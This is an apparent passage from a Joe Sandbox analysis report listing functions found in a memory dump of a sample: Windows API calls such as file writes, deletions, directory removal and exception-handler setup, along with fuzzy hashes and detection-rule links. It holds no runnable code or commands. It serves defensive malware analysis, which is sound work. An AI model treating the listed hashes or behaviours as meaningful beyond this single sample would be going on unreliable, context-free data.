API String ID: 2366752189-0
Opcode ID: b4f1478b6fdc608b573b2d6bb241fddc82556d2816959310d2dbf51914ce2f41
Instruction ID: b9f44d82ba4cb6c24f152d63ce96d8852f082d92484b54d7365d071901ec84b9
Opcode Fuzzy Hash: b4f1478b6fdc608b573b2d6bb241fddc82556d2816959310d2dbf51914ce2f41
Instruction Fuzzy Hash: 7541837770468086DB01CF7AF1402ADF7A4EB98BD9F084426EF4C43BA5DA39C591CB50

Function 000000014000E3F0 Relevance: 4.6, APIs: 3, Instructions: 67
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNEL32 ref: 000000014000E472
WriteFile.KERNEL32 ref: 000000014000E4D6
HeapFree.KERNEL32 ref: 000000014000E4E8

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: FileWrite$FreeHeap
String ID:
API String ID: 74418370-0
Opcode ID: 3e7180477ba1f40fccd38ab851f43380a29ccb8c1311c53bf450c0723d734870
Instruction ID: 9d08b72cfe526555b527e3d6fc60fa1eae748afb3cf0625e1a419d858907832f
Opcode Fuzzy Hash: 3e7180477ba1f40fccd38ab851f43380a29ccb8c1311c53bf450c0723d734870
Instruction Fuzzy Hash: 43317EB2205A8082EB22DF16E0453A9B7B0F789BD4F548515EB59577F4DF3EC488CB00

Function 000000014000D914 Relevance: 4.5, APIs: 3, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcsncpy.MSVCRT ref: 000000014000D932
wcslen.MSVCRT ref: 000000014000D944
CreateDirectoryW.KERNEL32 ref: 000000014000D994

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: CreateDirectorywcslenwcsncpy
String ID:
API String ID: 961886536-0
Opcode ID: fa21f94af638c1889f77ff21a456a4ec01e86cfe5917c6a19cc66424906e9b15
Instruction ID: 5f5e6732187473c7e9a992da28a106256b0abf82a063e4d7cd37b44a9c7c83f6
Opcode Fuzzy Hash: fa21f94af638c1889f77ff21a456a4ec01e86cfe5917c6a19cc66424906e9b15
Instruction Fuzzy Hash: 100188A621264191EF72DB65E0643E9B350F78C7C4F804523FB8D036A8EE3DC645CB14

Function 000000014000B538 Relevance: 4.5, APIs: 3, Instructions: 13
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 000000014000B547
InitCommonControlsEx.COMCTL32 ref: 000000014000B561
CoInitialize.OLE32 ref: 000000014000B569

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: CommonControlsInitInitializememset
String ID:
API String ID: 2179856907-0
Opcode ID: 1d0403c036cf950124697b7ff717d38e0227670877df9763daf1147e72240267
Instruction ID: 449a974473b47bcf77cc2e9d1d873e7016711834fb404a36d393ff203d460c1f
Opcode Fuzzy Hash: 1d0403c036cf950124697b7ff717d38e0227670877df9763daf1147e72240267
Instruction Fuzzy Hash: E0E0E27263658092E785EB22E8857AEB260FB88748FC06105F38B469A5CF3DC659CF00

Function 0000000140012210 Relevance: 3.8, APIs: 3, Instructions: 51
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TlsGetValue.KERNEL32 ref: 0000000140012223
HeapAlloc.KERNEL32 ref: 0000000140012266
HeapReAlloc.KERNEL32 ref: 0000000140012293

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: AllocHeap$Value
String ID:
API String ID: 3898337583-0
Opcode ID: 8fb7bdff1a5ea7f5a6416ebb7e65581105b868b3e6afb08efbefc70494558fec
Instruction ID: 13d1d2221b5dfffbe944c94766c5cf34ad854dcf92a9a233d77868c63a58341b
Opcode Fuzzy Hash: 8fb7bdff1a5ea7f5a6416ebb7e65581105b868b3e6afb08efbefc70494558fec
Instruction Fuzzy Hash: BA21A336609B40C6DA21CB5AE89136AB7A1F7CDBD4F108126EB8D87B38DF3DC5518B00

Function 00000001400029C8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetExitCodeProcess.KERNEL32 ref: 0000000140002ADD

Strings

open, xrefs: 0000000140002A68, 0000000140002A75

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: CodeExitProcess
String ID: open
API String ID: 3861947596-2758837156
Opcode ID: 4cf6f5f02477868f662f0c04b5321cd13397de582ab68467988eee586df03510
Instruction ID: e85bff13557fc8eee7e7e221a0258bb1a2e766680f88975b06e903b36e14beee
Opcode Fuzzy Hash: 4cf6f5f02477868f662f0c04b5321cd13397de582ab68467988eee586df03510
Instruction Fuzzy Hash: 44315E73A19A84D9DA619B6AF8417EE6364F388784F404415FF8D07B6ADF3CC2958B40

Function 0000000140001000 Relevance: 3.1, APIs: 2, Instructions: 112
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140012060: HeapCreate.KERNEL32 ref: 000000014001206E
Part of subcall function 0000000140012060: TlsAlloc.KERNEL32 ref: 000000014001207B

Part of subcall function 000000014000C980: HeapCreate.KERNEL32 ref: 000000014000C98E

Part of subcall function 000000014000B538: memset.MSVCRT ref: 000000014000B547
Part of subcall function 000000014000B538: InitCommonControlsEx.COMCTL32 ref: 000000014000B561
Part of subcall function 000000014000B538: CoInitialize.OLE32 ref: 000000014000B569

Part of subcall function 00000001400120D0: HeapAlloc.KERNEL32 ref: 0000000140012123

Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CD11
Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CD42
Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CDB2

Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D56E
Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D58F
Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D5A1

Part of subcall function 000000014000D444: HeapAlloc.KERNEL32 ref: 000000014000D476
Part of subcall function 000000014000D444: HeapAlloc.KERNEL32 ref: 000000014000D491

Part of subcall function 0000000140011D30: HeapAlloc.KERNEL32 ref: 0000000140011D82
Part of subcall function 0000000140011D30: memset.MSVCRT ref: 0000000140011DB6

Part of subcall function 00000001400120D0: HeapReAlloc.KERNEL32 ref: 0000000140012151
Part of subcall function 00000001400120D0: HeapFree.KERNEL32 ref: 0000000140012194

Part of subcall function 000000014000C4D0: RemoveVectoredExceptionHandler.KERNEL32 ref: 000000014000C8A5
Part of subcall function 000000014000C4D0: AddVectoredExceptionHandler.KERNEL32 ref: 000000014000C8C0

Part of subcall function 00000001400121C0: GetLastError.KERNEL32 ref: 00000001400121C4
Part of subcall function 00000001400121C0: TlsGetValue.KERNEL32 ref: 00000001400121D4
Part of subcall function 00000001400121C0: SetLastError.KERNEL32 ref: 00000001400121F1

Part of subcall function 0000000140012210: TlsGetValue.KERNEL32 ref: 0000000140012223
Part of subcall function 0000000140012210: HeapAlloc.KERNEL32 ref: 0000000140012266

HeapDestroy.KERNEL32 ref: 000000014000124C
ExitProcess.KERNEL32 ref: 0000000140001258

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: Heap$Alloc$Free$CreateErrorExceptionHandlerLastValueVectoredmemset$CommonControlsDestroyExitInitInitializeProcessRemove
String ID:
API String ID: 1207063833-0
Opcode ID: 06dbeff3fd86c6695b84df31992dbf02651ab7d441abcdbe23a8bedf592c97f1
Instruction ID: 5ef5c56730dbad915fac233b77092dd37bc53bc4ec3343fa221c1b372e2f6746
Opcode Fuzzy Hash: 06dbeff3fd86c6695b84df31992dbf02651ab7d441abcdbe23a8bedf592c97f1
Instruction Fuzzy Hash: 9D510AF0A11A4081FA03F7A3F8527E926559B9D7D0F808119BF1D1B3F3DD3A86598B22

Function 0000000140002930 Relevance: 3.0, APIs: 2, Instructions: 36
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000001400123E0: TlsGetValue.KERNEL32 ref: 00000001400123F8

RemoveDirectoryW.KERNEL32(00000000,?,0000000140003010), ref: 000000014000299C
RemoveDirectoryW.KERNEL32(?,0000000140003010), ref: 00000001400029A8

Part of subcall function 0000000140007170: WaitForSingleObject.KERNEL32 ref: 0000000140007187

Part of subcall function 000000014000720C: TerminateThread.KERNEL32 ref: 0000000140007223
Part of subcall function 000000014000720C: EnterCriticalSection.KERNEL32 ref: 0000000140007230

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: DirectoryRemove$CriticalEnterObjectSectionSingleTerminateThreadValueWait
String ID:
API String ID: 547990026-0
Opcode ID: de809ab9685b3f463e7d0b476c7a816dcb7d80807795b0b8c6412b9b34da734e
Instruction ID: 7a41e47de86a43ff34abb2becfbad555fd020f9bfb046cc2ed969e3c0c855493
Opcode Fuzzy Hash: de809ab9685b3f463e7d0b476c7a816dcb7d80807795b0b8c6412b9b34da734e
Instruction Fuzzy Hash: 0F01FFF5509B01E5F923BB63BC02BDA6B61E74E3E0F409405BB89131B3DE3DD9849610

Function 000000014000C4D0 Relevance: 3.0, APIs: 2, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RemoveVectoredExceptionHandler.KERNEL32 ref: 000000014000C8A5
AddVectoredExceptionHandler.KERNEL32 ref: 000000014000C8C0

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: ExceptionHandlerVectored$Remove
String ID:
API String ID: 3670940754-0
Opcode ID: 24e0dcc2aecd05812467741a67881873fe67c89a035702fa94287bcbf95b7463
Instruction ID: 54ed52b0d94e107c171475cce83a86a7777a808cb3853d4771323e3d57a36066
Opcode Fuzzy Hash: 24e0dcc2aecd05812467741a67881873fe67c89a035702fa94287bcbf95b7463
Instruction Fuzzy Hash: 8AF0ED7061370485FE5BDB93B8987F472A0AB4C7C0F184029BB49076719F3C88A48348

Function 000000014000DA6C Relevance: 3.0, APIs: 2, Instructions: 19
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFileAttributesW.KERNEL32 ref: 000000014000DA8C
DeleteFileW.KERNEL32 ref: 000000014000DA95

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: File$AttributesDelete
String ID:
API String ID: 2910425767-0
Opcode ID: 55319c824811060fb78973d35cd1766170822acc88010ad74a6f5b99716599dc
Instruction ID: adf2a79140fabccb03c20fd21f07aa3af446659453137af282c5310bbe8ffc9f
Opcode Fuzzy Hash: 55319c824811060fb78973d35cd1766170822acc88010ad74a6f5b99716599dc
Instruction Fuzzy Hash: 48E05BB471910195FB6BD7A778153F521419F8D7D1F184121AB42071B0EF3D44C55222

Function 0000000140012060 Relevance: 3.0, APIs: 2, Instructions: 11
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNEL32 ref: 000000014001206E
TlsAlloc.KERNEL32 ref: 000000014001207B

Part of subcall function 0000000140012BF0: HeapAlloc.KERNEL32 ref: 0000000140012C03
Part of subcall function 0000000140012BF0: HeapAlloc.KERNEL32 ref: 0000000140012C1D
Part of subcall function 0000000140012BF0: TlsSetValue.KERNEL32 ref: 0000000140012C50

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: AllocHeap$CreateValue
String ID:
API String ID: 493873155-0
Opcode ID: 9e0d5e764e4f7f0553988baf76ecb42ee58d508d85325be61ca51fd0dfb33207
Instruction ID: 66307e28580f649ba8418ae6b9c958ace7f1b69875393c61862d084d03b91818
Opcode Fuzzy Hash: 9e0d5e764e4f7f0553988baf76ecb42ee58d508d85325be61ca51fd0dfb33207
Instruction Fuzzy Hash: 9ED0C939A1175092EB46AB72AC5A3E922A0F75C3C1F901819B70907775DF7E81956A00

Function 00000001400120A0 Relevance: 3.0, APIs: 2, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

HeapDestroy.KERNEL32 ref: 00000001400120AB
TlsFree.KERNEL32 ref: 00000001400120B7

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: DestroyFreeHeap
String ID:
API String ID: 3293292866-0
Opcode ID: fbac162b21188d979bef22f7e680530c08c33df644155045fadef908a37ca857
Instruction ID: 71a10d3d5b3131d437c50284ad1bfb95f0c128dd24e11de8e9b8b88d768efc2d
Opcode Fuzzy Hash: fbac162b21188d979bef22f7e680530c08c33df644155045fadef908a37ca857
Instruction Fuzzy Hash: 4CC04C34611400D2E606EB13EC953A42362B79C7C5F801414E70E1B671CE394955E700

Function 0000000140011D30 Relevance: 2.6, APIs: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140011EF4: HeapFree.KERNEL32 ref: 0000000140011F4D

HeapAlloc.KERNEL32 ref: 0000000140011D82
memset.MSVCRT ref: 0000000140011DB6

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: Heap$AllocFreememset
String ID:
API String ID: 3063399779-0
Opcode ID: edd241adf8553052784530922556135fb4408ba6f5c1699abdea0ec7c528a08c
Instruction ID: 5c5c97092251ccb6e51d21bc2c296289ab600fd53c4e4fe069e69402a2a58e68
Opcode Fuzzy Hash: edd241adf8553052784530922556135fb4408ba6f5c1699abdea0ec7c528a08c
Instruction Fuzzy Hash: F7213B32601B5086EA1ADB53BC41799A6A8FBC8FD0F498025AF584BB66DE38C852C340

Function 00000001400126D0 Relevance: 2.6, APIs: 2, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 00000001400126E2
HeapReAlloc.KERNEL32 ref: 0000000140012762

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: AllocHeapValue
String ID:
API String ID: 2362848668-0
Opcode ID: 5469319e057a9dc06414a52f1e9995086a4e4d267debc5f29e971f3f59de7243
Instruction ID: d5031950f6f24f379c2142eebe898701a91e7a03f91a2b9bee16bac6c279ab43
Opcode Fuzzy Hash: 5469319e057a9dc06414a52f1e9995086a4e4d267debc5f29e971f3f59de7243
Instruction Fuzzy Hash: 2D219676609B44C6CB20CF5AE49025AB7A0F7CCBA8F144216EB8D43B78DF79C651CB40

Function 000000014000DD30 Relevance: 2.5, APIs: 2, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 000000014000DD88
CloseHandle.KERNEL32 ref: 000000014000DD91

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: CloseFreeHandleHeap
String ID:
API String ID: 1642312469-0
Opcode ID: 9545ea4844ef45e69c2d13a7e6758b9fd96cb3dc2a279fbef2982152c74e1bd8
Instruction ID: 5f93da8337f86b39695cad05c5aa1bbbcf0731d39a623fe836b1511b3ba38e21
Opcode Fuzzy Hash: 9545ea4844ef45e69c2d13a7e6758b9fd96cb3dc2a279fbef2982152c74e1bd8
Instruction Fuzzy Hash: AD01FB71614A4081EA56EBA7F5543E96391ABCDBE0F445216BB2E4B7F6DE38C4808740

Function 00000001400122F0 Relevance: 2.5, APIs: 2, Instructions: 25memoryCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 000000014001230B
HeapAlloc.KERNEL32 ref: 000000014001232C

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: AllocHeapwcslen
String ID:
API String ID: 746647629-0
Opcode ID: 81789514eeed516ebf87f83d925e2a503bc1185eff46d0294f6b5050b1c1ed04
Instruction ID: 39c3555cb5e633ae9f9a5314a67da5fdcb628df671bb12a0019ba56a0bb7f9c1
Opcode Fuzzy Hash: 81789514eeed516ebf87f83d925e2a503bc1185eff46d0294f6b5050b1c1ed04
Instruction Fuzzy Hash: 3DF0E276608A8082D621DB1AE44134AA7B1F3C9BC4F104125EBCC83B69CF3EC9518A00

Function 000000014000DDC0 Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000000014000DDED

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 286ead757777a38e56b81a59e831c417c9f8bfd861d199e35aced7c4af5c72c7
Instruction ID: 85eb21683fd68773ec3f68e7974a7ba45b0d300be2a951898864618d3eded784
Opcode Fuzzy Hash: 286ead757777a38e56b81a59e831c417c9f8bfd861d199e35aced7c4af5c72c7
Instruction Fuzzy Hash: D4F030B6624694CBCB10DF39E00166977B0F349B48F200416EF4847764DB36C992CF10

Function 0000000140010FFC Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

TlsFree.KERNEL32 ref: 0000000140011019

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: Free
String ID:
API String ID: 3978063606-0
Opcode ID: b403f4cd7e6b1ea5231d56a542ea7710078fdd6c3183311bb8828c9ff7a2dcca
Instruction ID: 3be53cbf4efc602c07d04e61f546686734bccd281855bf9d316eb8d3f4bb89d6
Opcode Fuzzy Hash: b403f4cd7e6b1ea5231d56a542ea7710078fdd6c3183311bb8828c9ff7a2dcca
Instruction Fuzzy Hash: E3D0E97091558096F66BA747EC857E422A2B7AC3C5F500419E3050B1B28ABE49DDEA15

Function 000000014000DC88 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNEL32 ref: 000000014000DC91

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 93ac6205523c289b50a33b5b006d9a2b969cc6c5ca2cd3404325313acfcde68d
Instruction ID: d26b75307fbf4d2f65b3bf59e092d1c76b80437de534da0d48005b48f8adbafa
Opcode Fuzzy Hash: 93ac6205523c289b50a33b5b006d9a2b969cc6c5ca2cd3404325313acfcde68d
Instruction Fuzzy Hash: 74C09B74663002C1FA6A936328A97E451905B0C391F504511F7064117089BD14975530

Function 000000014000C980 Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32 ref: 000000014000C98E

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 3010fbf55b21657f3d2da30d78e3fc06337a299998e6cc7e6108e39cc3db3a27
